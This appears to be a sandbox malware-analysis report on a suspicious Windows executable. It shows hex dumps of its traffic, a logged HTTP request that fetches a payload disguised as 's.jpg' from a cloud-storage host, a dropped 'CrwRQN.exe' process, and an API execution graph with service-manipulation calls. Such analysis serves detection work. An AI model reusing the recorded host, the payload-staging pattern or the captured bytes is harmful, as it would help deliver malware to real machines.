                                  2025-01-11 03:35:43 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                                  Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                  2025-01-11 03:35:43 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                                  Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                  2025-01-11 03:35:43 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                                  Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                  2025-01-11 03:35:43 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                  Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                  2025-01-11 03:35:43 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                  Data Ascii: ,$LDld=5}u]U
                                  2025-01-11 03:35:43 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                                  Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                  2025-01-11 03:35:43 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 23 78 04 bf
                                  Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS#x


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.45001139.103.20.1054437276C:\Users\user\Desktop\2976587-987347589.07.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-11 03:35:44 UTC111OUTGET /s.jpg HTTP/1.1
                                  User-Agent: GetData
                                  Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                  Cache-Control: no-cache
                                  2025-01-11 03:35:44 UTC543INHTTP/1.1 200 OK
                                  Server: AliyunOSS
                                  Date: Sat, 11 Jan 2025 03:35:44 GMT
                                  Content-Type: image/jpeg
                                  Content-Length: 8299
                                  Connection: close
                                  x-oss-request-id: 6781E710B2582233307044CF
                                  Accept-Ranges: bytes
                                  ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                  Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT
                                  x-oss-object-type: Normal
                                  x-oss-hash-crc64ecma: 692387538176721524
                                  x-oss-storage-class: Standard
                                  x-oss-ec: 0048-00000104
                                  Content-Disposition: attachment
                                  x-oss-force-download: true
                                  Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                  x-oss-server-time: 2
                                  2025-01-11 03:35:44 UTC3553INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                  Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                  2025-01-11 03:35:44 UTC4096INData Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5
                                  Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                  2025-01-11 03:35:44 UTC650INData Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90
                                  Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:22:34:02
                                  Start date:10/01/2025
                                  Path:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\Desktop\2976587-987347589.07.exe"
                                  Imagebase:0x140000000
                                  File size:30'887'936 bytes
                                  MD5 hash:67AB54B4FC69F4175D217DD57154A27C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:5
                                  Start time:22:35:43
                                  Start date:10/01/2025
                                  Path:C:\Users\user\Documents\CrwRQN.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\user\Documents\CrwRQN.exe
                                  Imagebase:0x140000000
                                  File size:133'136 bytes
                                  MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 0%, ReversingLabs
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:6
                                  Start time:22:35:44
                                  Start date:10/01/2025
                                  Path:C:\Users\user\Documents\CrwRQN.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\user\Documents\CrwRQN.exe
                                  Imagebase:0x140000000
                                  File size:133'136 bytes
                                  MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:7
                                  Start time:22:36:01
                                  Start date:10/01/2025
                                  Path:C:\Users\user\Documents\CrwRQN.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\user\Documents\CrwRQN.exe
                                  Imagebase:0x140000000
                                  File size:133'136 bytes
                                  MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:2.1%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:32%
                                    Total number of Nodes:462
                                    Total number of Limit Nodes:7
                                    execution_graph 13939 140005df3 13940 140005e71 13939->13940 13941 140005e84 CreateFileA 13940->13941 13942 140005f50 _SetImageBase 13941->13942 13943 140005fc3 malloc ReadFile 13942->13943 16579 7ffe1a4c11b0 16584 7ffe1a4c1209 16579->16584 16580 7ffe1a4c1b70 _log10_special 8 API calls 16583 7ffe1a4c14d3 16580->16583 16581 7ffe1a4c1b90 51 API calls 16597 7ffe1a4c1300 BuildCatchObjectHelperInternal 16581->16597 16582 7ffe1a4c14f0 16612 7ffe1a4c1a40 16582->16612 16584->16582 16586 7ffe1a4c12c7 16584->16586 16587 7ffe1a4c129e 16584->16587 16590 7ffe1a4c12b9 BuildCatchObjectHelperInternal 16584->16590 16584->16597 16588 7ffe1a4c1b90 51 API calls 16586->16588 16589 7ffe1a4c14f6 16587->16589 16598 7ffe1a4c1b90 16587->16598 16588->16590 16615 7ffe1a4c1110 16589->16615 16590->16581 16595 7ffe1a4c14eb 16607 7ffe1a4c79cc 16595->16607 16597->16580 16599 7ffe1a4c1b9b 16598->16599 16600 7ffe1a4c12b0 16599->16600 16601 7ffe1a4c7a4c _invalid_parameter_noinfo 2 API calls 16599->16601 16602 7ffe1a4c1bba 16599->16602 16600->16590 16600->16595 16601->16599 16603 7ffe1a4c1bc5 16602->16603 16621 7ffe1a4c21f0 16602->16621 16605 7ffe1a4c1110 Concurrency::cancel_current_task 51 API calls 16603->16605 16606 7ffe1a4c1bcb 16605->16606 16608 7ffe1a4c7844 _invalid_parameter_noinfo 47 API calls 16607->16608 16609 7ffe1a4c79e5 16608->16609 16610 7ffe1a4c79fc _invalid_parameter_noinfo_noreturn 17 API calls 16609->16610 16611 7ffe1a4c79fa 16610->16611 16625 7ffe1a4c1b34 16612->16625 16616 7ffe1a4c111e Concurrency::cancel_current_task 16615->16616 16617 7ffe1a4c3990 std::_Xinvalid_argument 2 API calls 16616->16617 16618 7ffe1a4c112f 16617->16618 16619 7ffe1a4c379c __std_exception_copy 49 API calls 16618->16619 16620 7ffe1a4c1159 16619->16620 16622 7ffe1a4c21fe Concurrency::cancel_current_task 16621->16622 16623 7ffe1a4c3990 std::_Xinvalid_argument 2 API calls 16622->16623 16624 7ffe1a4c220f 16623->16624 16630 7ffe1a4c1ab0 16625->16630 16628 7ffe1a4c3990 std::_Xinvalid_argument 2 API calls 16629 7ffe1a4c1b56 16628->16629 16631 7ffe1a4c379c __std_exception_copy 49 API calls 16630->16631 16632 7ffe1a4c1ae4 16631->16632 16632->16628 15119 140007412 15121 140007333 15119->15121 15120 1400073e0 LdrLoadDll 15120->15121 15121->15120 15122 140007403 15121->15122 15527 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15530 1400054e0 15527->15530 15529 1400136ef 15531 14000552c 15530->15531 15534 140005506 sprintf_s 15530->15534 15532 1400074d0 LdrLoadDll 15531->15532 15533 140005536 15532->15533 15535 140008370 3 API calls 15533->15535 15534->15529 15539 140005545 _SetImageBase 15535->15539 15536 1400055b8 15537 140008de0 _lock 2 API calls 15536->15537 15538 1400055c0 sprintf_s 15537->15538 15538->15534 15539->15536 15540 1400074f0 LdrLoadDll 15539->15540 15541 140005561 CreateThread 15540->15541 15541->15538 15542 1400055b0 GetLastError 15541->15542 15542->15536 13948 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13949 140005ab1 13948->13949 13950 140005add GetVersionExA 13948->13950 13951 140005abf 13949->13951 13998 140009540 13949->13998 13952 140005b0e GetProcessHeap HeapFree 13950->13952 13953 140005af0 GetProcessHeap HeapFree 13950->13953 14006 140009300 13951->14006 13958 140005b3c 13952->13958 13954 140005d0b 13953->13954 13957 140005ac9 14017 140008510 GetModuleHandleA 13957->14017 14021 14000a310 HeapCreate 13958->14021 13961 140005bec 13962 140005c12 13961->13962 13963 140005bf0 13961->13963 13967 140005c17 13962->13967 13964 140005bfe 13963->13964 13965 140009540 _lock 12 API calls 13963->13965 13966 140009300 _lock 10 API calls 13964->13966 13965->13964 13968 140005c08 13966->13968 13969 140005c3d 13967->13969 13971 140005c29 13967->13971 13972 140009540 _lock 12 API calls 13967->13972 13970 140008510 _lock 3 API calls 13968->13970 14024 140009f50 GetStartupInfoA 13969->14024 13970->13962 13973 140009300 _lock 10 API calls 13971->13973 13972->13971 13975 140005c33 13973->13975 13977 140008510 _lock 3 API calls 13975->13977 13977->13969 13978 140005c56 14044 140009e30 13978->14044 13981 140005c5b 14062 140009c30 13981->14062 13985 140005c73 13986 140005c81 13985->13986 13988 1400084e0 _lock 12 API calls 13985->13988 14092 140009690 13986->14092 13988->13986 13989 140005c86 13990 140005c94 13989->13990 13991 1400084e0 _lock 12 API calls 13989->13991 14104 140008650 13990->14104 13991->13990 13993 140005c9e 13994 1400084e0 _lock 12 API calls 13993->13994 13995 140005ca9 13993->13995 13994->13995 14108 140001520 13995->14108 13997 140005ad3 13997->13954 13999 14000954e _lock 13998->13999 14000 14000959c 13999->14000 14001 14000961c 13999->14001 14003 1400095c9 GetStdHandle 13999->14003 14002 140009300 _lock 10 API calls 14000->14002 14001->13951 14002->14001 14003->14000 14004 1400095dc 14003->14004 14004->14000 14005 1400095e2 WriteFile 14004->14005 14005->14000 14009 140009320 _lock 14006->14009 14007 140009330 14007->13957 14008 1400094dc GetStdHandle 14008->14007 14010 1400094ef 14008->14010 14009->14007 14009->14008 14012 140009375 _lock 14009->14012 14010->14007 14011 1400094f5 WriteFile 14010->14011 14011->14007 14012->14007 14013 1400093b9 GetModuleFileNameA 14012->14013 14014 1400093d9 _lock 14013->14014 14126 14000f000 14014->14126 14018 140008543 ExitProcess 14017->14018 14019 14000852a GetProcAddress 14017->14019 14019->14018 14020 14000853f 14019->14020 14020->14018 14022 14000a334 14021->14022 14023 14000a339 HeapSetInformation 14021->14023 14022->13961 14023->13961 14152 140008370 14024->14152 14026 140005c48 14026->13978 14037 1400084e0 14026->14037 14027 14000a1c4 GetStdHandle 14034 14000a17c 14027->14034 14028 140008370 3 API calls 14031 140009f8a 14028->14031 14029 14000a239 SetHandleCount 14029->14026 14030 14000a1d8 GetFileType 14030->14034 14031->14026 14031->14028 14032 14000a0e3 14031->14032 14031->14034 14032->14026 14033 14000a11c GetFileType 14032->14033 14032->14034 14157 14000edc0 14032->14157 14033->14032 14034->14026 14034->14027 14034->14029 14034->14030 14036 14000edc0 _lock 3 API calls 14034->14036 14036->14034 14038 140009540 _lock 12 API calls 14037->14038 14039 1400084ed 14038->14039 14040 140009300 _lock 10 API calls 14039->14040 14041 1400084f4 14040->14041 14042 1400073e0 _lock LdrLoadDll 14041->14042 14043 140008500 14042->14043 14045 140009e7c 14044->14045 14046 140009e3e GetCommandLineW 14044->14046 14049 140009e81 GetCommandLineW 14045->14049 14051 140009e69 14045->14051 14047 140009e49 GetCommandLineW 14046->14047 14048 140009e5e GetLastError 14046->14048 14047->14048 14050 140009e75 14048->14050 14048->14051 14049->14051 14050->13981 14051->14050 14052 140009e91 GetCommandLineA MultiByteToWideChar 14051->14052 14053 140009ec8 14052->14053 14054 140009ed9 14052->14054 14053->13981 14055 140008370 3 API calls 14054->14055 14056 140009eeb 14055->14056 14057 140009f32 14056->14057 14058 140009ef3 MultiByteToWideChar 14056->14058 14057->13981 14059 140009f13 14058->14059 14060 140009f2a 14058->14060 14059->13981 14171 140008de0 14060->14171 14063 140009c52 GetEnvironmentStringsW 14062->14063 14067 140009c86 14062->14067 14064 140009c6c GetLastError 14063->14064 14072 140009c60 14063->14072 14066 140009c77 14064->14066 14064->14067 14065 140009c91 GetEnvironmentStringsW 14069 140005c67 14065->14069 14065->14072 14068 140009d09 GetEnvironmentStrings 14066->14068 14066->14069 14067->14065 14067->14066 14068->14069 14070 140009d17 14068->14070 14088 1400099c0 GetModuleFileNameW 14069->14088 14071 140009d58 14070->14071 14075 140009d20 MultiByteToWideChar 14070->14075 14076 140008370 3 API calls 14071->14076 14176 140008300 14072->14176 14075->14069 14075->14070 14079 140009d68 14076->14079 14077 140009ce1 __CxxFrameHandler 14083 140009cef FreeEnvironmentStringsW 14077->14083 14078 140009cd1 FreeEnvironmentStringsW 14078->14069 14080 140009d7d 14079->14080 14081 140009d70 FreeEnvironmentStringsA 14079->14081 14082 140009de5 FreeEnvironmentStringsA 14080->14082 14084 140009d90 MultiByteToWideChar 14080->14084 14081->14069 14082->14069 14083->14069 14084->14080 14085 140009e0e 14084->14085 14086 140008de0 _lock 2 API calls 14085->14086 14087 140009e16 FreeEnvironmentStringsA 14086->14087 14087->14069 14089 140009a03 14088->14089 14090 140008300 _lock 17 API calls 14089->14090 14091 140009bca 14089->14091 14090->14091 14091->13985 14093 1400096b2 14092->14093 14094 1400096a8 14092->14094 14095 140008370 3 API calls 14093->14095 14094->13989 14096 1400096fa 14095->14096 14097 140009709 14096->14097 14098 1400097a5 14096->14098 14100 140008370 3 API calls 14096->14100 14101 1400097e5 14096->14101 14097->13989 14099 140008de0 _lock 2 API calls 14098->14099 14103 1400097b4 14099->14103 14100->14096 14102 140008de0 _lock 2 API calls 14101->14102 14102->14103 14103->13989 14106 140008666 14104->14106 14107 1400086bf 14106->14107 14192 140005380 14106->14192 14107->13993 14109 140001565 14108->14109 14110 140001569 14109->14110 14111 14000157e 14109->14111 14230 140001430 GetModuleFileNameW OpenSCManagerW 14110->14230 14114 140001595 OpenSCManagerW 14111->14114 14115 14000164f 14111->14115 14118 1400015b2 GetLastError 14114->14118 14119 1400015cf OpenServiceW 14114->14119 14116 140001654 14115->14116 14117 140001669 StartServiceCtrlDispatcherW 14115->14117 14239 1400011f0 14116->14239 14117->13997 14118->13997 14121 140001611 DeleteService 14119->14121 14122 1400015e9 GetLastError CloseServiceHandle 14119->14122 14123 140001626 CloseServiceHandle CloseServiceHandle 14121->14123 14124 14000161e GetLastError 14121->14124 14122->13997 14123->13997 14124->14123 14127 14000f01e _lock 14126->14127 14128 14000f03b LoadLibraryA 14127->14128 14129 14000f125 _lock 14127->14129 14130 14000f054 GetProcAddress 14128->14130 14131 1400094c9 14128->14131 14144 14000f165 14129->14144 14149 1400073e0 LdrLoadDll 14129->14149 14130->14131 14132 14000f06d _lock 14130->14132 14131->13957 14136 14000f075 GetProcAddress 14132->14136 14134 1400073e0 _lock LdrLoadDll 14134->14131 14135 1400073e0 _lock LdrLoadDll 14141 14000f1e9 14135->14141 14138 140007220 _lock 14136->14138 14140 14000f094 GetProcAddress 14138->14140 14139 1400073e0 _lock LdrLoadDll 14139->14144 14143 14000f0b3 _lock 14140->14143 14142 1400073e0 _lock LdrLoadDll 14141->14142 14145 14000f1a3 _lock 14141->14145 14142->14145 14143->14129 14146 14000f0e9 GetProcAddress 14143->14146 14144->14135 14144->14145 14145->14134 14147 14000f101 _lock 14146->14147 14147->14129 14148 14000f10d GetProcAddress 14147->14148 14148->14129 14150 140007333 14149->14150 14150->14149 14151 140007403 14150->14151 14151->14139 14153 1400083a0 14152->14153 14155 1400083e0 14153->14155 14156 1400083be Sleep 14153->14156 14163 14000e850 14153->14163 14155->14031 14156->14153 14156->14155 14158 1400073e0 _lock LdrLoadDll 14157->14158 14159 14000edec _lock 14158->14159 14160 14000ee1d _lock 14159->14160 14161 14000ee26 GetModuleHandleA 14159->14161 14160->14032 14161->14160 14162 14000ee38 GetProcAddress 14161->14162 14162->14160 14164 14000e865 14163->14164 14165 14000e8be HeapAlloc 14164->14165 14167 14000e876 sprintf_s 14164->14167 14168 1400090b0 14164->14168 14165->14164 14165->14167 14167->14153 14169 1400073e0 _lock LdrLoadDll 14168->14169 14170 1400090c5 14169->14170 14170->14164 14172 140008de9 HeapFree 14171->14172 14173 140008e19 _lock 14171->14173 14172->14173 14174 140008dff sprintf_s 14172->14174 14173->14057 14175 140008e09 GetLastError 14174->14175 14175->14173 14177 140008320 14176->14177 14179 140008338 Sleep 14177->14179 14180 140008358 14177->14180 14181 1400090f0 14177->14181 14179->14177 14179->14180 14180->14077 14180->14078 14182 14000919e 14181->14182 14189 140009103 14181->14189 14183 1400090b0 _lock LdrLoadDll 14182->14183 14185 1400091a3 sprintf_s 14183->14185 14184 14000914c HeapAlloc 14184->14189 14190 140009173 sprintf_s 14184->14190 14185->14177 14186 140009540 _lock 12 API calls 14186->14189 14187 140009300 _lock 10 API calls 14187->14189 14188 1400090b0 _lock LdrLoadDll 14188->14189 14189->14184 14189->14186 14189->14187 14189->14188 14189->14190 14191 140008510 _lock 3 API calls 14189->14191 14190->14177 14191->14189 14195 